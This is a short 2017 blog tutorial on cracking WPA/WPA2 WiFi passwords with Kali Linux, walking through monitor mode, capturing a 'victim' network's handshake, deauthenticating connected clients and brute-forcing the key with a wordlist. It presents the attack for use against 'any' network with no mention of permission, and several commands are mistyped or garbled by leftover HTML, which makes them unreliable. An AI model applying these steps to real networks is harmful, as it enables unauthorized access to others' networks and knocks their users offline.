Saturday 22 April 2017

How to crack a wifi password with WPA / WPA2 security type

Kali Linux 2.0 Crack WPA & WPA2 WiFi Password - Bruteforce 




This time I'll explain to you, How to crack any WPA/WPA2 Wifi Password With Using an bruteforce method with an dictionary . 


Lets Start : 

if you don't know how to make an wordlist.txt please wait untui i description in next post in my blog. 

1.  Open up a new terminal and type 

airmon-ng start wlan0

we have some interference with other process runing, so close that type : 

airmon-ng stop wlan0
airmon-ng check kill 
aormon-ng start wlan0

2. Now thats set, to search for ab victim network type :

airodump-ng wlan0mon 

3. search for a victim WiFi essid network name and press "CTRL+C" to stop the scan. 

4. Now tupe in a new terminal 

airodump-ng --bssid(bssid) -c (channel) -- write /root/Dekstop/crack-wpa wlan0mon 

(this will scan throught the devices inside the network)

5. now open up a new terminal and type :" 

aireplay-ng --deauth 10 -a (bssid) wlan0mon

(this kick the victim off the network and joins back in to collect an handshake)

6. now to crack the wifi password type

aircrack-ng -w (wordlist) -b (bssid) crack-wpa.cap <-- file="" font="" name="" nbsp="" your="">

7. wait for it to Bruteforce the Wifi password and you will succesfully collect it eventually. 


for detail see on this video : 

plese click this link 
https://youtu.be/GuEEHbThJ3Q



























Load disqus comments

0 comments